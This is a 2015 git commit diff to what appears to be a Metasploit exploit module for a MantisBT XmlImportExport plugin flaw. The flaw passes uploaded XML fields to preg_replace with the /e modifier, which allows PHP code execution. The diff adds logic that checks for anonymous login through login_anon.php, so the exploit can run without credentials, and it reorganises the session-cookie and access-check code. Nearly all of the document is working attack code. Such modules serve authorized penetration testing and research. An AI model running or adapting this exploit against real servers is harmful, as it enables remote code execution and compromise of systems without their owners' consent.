support for anonymous login

firefart · firefart · commit 39e33739ea02 · 2015-01-07T00:08:04.000+01:00
diff --git a/modules/exploits/multi/http/mantisbt_php_exec.rb b/modules/exploits/multi/http/mantisbt_php_exec.rb
@@ -18,7 +18,7 @@ def initialize(info = {})
         The vulnerable code exists on plugins/XmlImportExport/ImportXml.php, which receives user input through the "description" field and the "issuelink" attribute of an uploaded XML file and passes to preg_replace() function with the /e modifier.
         This allows a remote authenticated attacker to execute arbitrary PHP code on the remote machine.
         This version also suffers from another issue. The import page is not checking the correct user level
-        of the user, so it's possible to exploit this issue with any user.
+        of the user, so it's possible to exploit this issue with any user including the anonymous one if enabled.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -59,38 +59,44 @@ def check
   end
 
   def do_login()
-    print_status('Checking access to MantisBT...')
+    # check for anonymous login
     res = send_request_cgi({
       'method'   => 'GET',
-      'uri'      => normalize_uri(target_uri.path, 'login_page.php'),
-      'vars_get' => {
-        'return'  => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import')
-      }
-    })
-
-    fail_with(Failure::NoAccess, 'Error accessing MantisBT') unless res && res.code == 200
-
-    session_cookie = res.get_cookies
-
-    print_status('Logging in...')
-    res = send_request_cgi({
-      'method'    => 'POST',
-      'uri'       => normalize_uri(target_uri.path, 'login.php'),
-      'cookie'    => session_cookie,
-      'vars_post' => {
-        'return'  => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import'),
-        'username' => datastore['username'],
-        'password' => datastore['password'],
-        'secure_session' => 'on'
-      }
+      'uri'      => normalize_uri(target_uri.path, 'login_anon.php')
     })
+    # if the redirect contains a username (non empty), anonymous access is enabled
+    if res && res.redirect? && res.redirection && res.redirection.query =~ /username=[^&]+/
+      print_status('Anonymous access enabled, no need to log in')
+      session_cookie = res.get_cookies
+    else
+      res = send_request_cgi({
+        'method'   => 'GET',
+        'uri'      => normalize_uri(target_uri.path, 'login_page.php'),
+        'vars_get' => {
+          'return'  => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import')
+        }
+      })
+      session_cookie = res.get_cookies
+      print_status('Logging in...')
+      res = send_request_cgi({
+        'method'    => 'POST',
+        'uri'       => normalize_uri(target_uri.path, 'login.php'),
+        'cookie'    => session_cookie,
+        'vars_post' => {
+          'return'  => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import'),
+          'username' => datastore['username'],
+          'password' => datastore['password'],
+          'secure_session' => 'on'
+        }
+      })
+      fail_with(Failure::NoAccess, 'Login failed') unless res && res.code == 302
+
+      fail_with(Failure::NoAccess, 'Wrong credentials') unless res.redirection.to_s !~ /login_page.php/
+
+      session_cookie = "#{session_cookie} #{res.get_cookies}"
+    end
 
-
-    fail_with(Failure::NoAccess, 'Login failed') unless res && res.code == 302
-
-    fail_with(Failure::NoAccess, 'Wrong credentials') unless res.redirection.to_s !~ /login_page.php/
-
-    "#{session_cookie} #{res.get_cookies}"
+    session_cookie
   end
 
   def upload_xml(payload_b64, rand_text, cookies, is_check)
@@ -219,6 +225,13 @@ def upload_xml(payload_b64, rand_text, cookies, is_check)
   end
 
   def exec_php(php_code, is_check = false)
+    print_status('Checking access to MantisBT...')
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path)
+    })
+
+    fail_with(Failure::NoAccess, 'Error accessing MantisBT') unless res && (res.code == 200 || res.redirection)
 
     # remove comments, line breaks and spaces of php_code
     payload_clean = php_code.gsub(/(\s+)|(#.*)/, '')
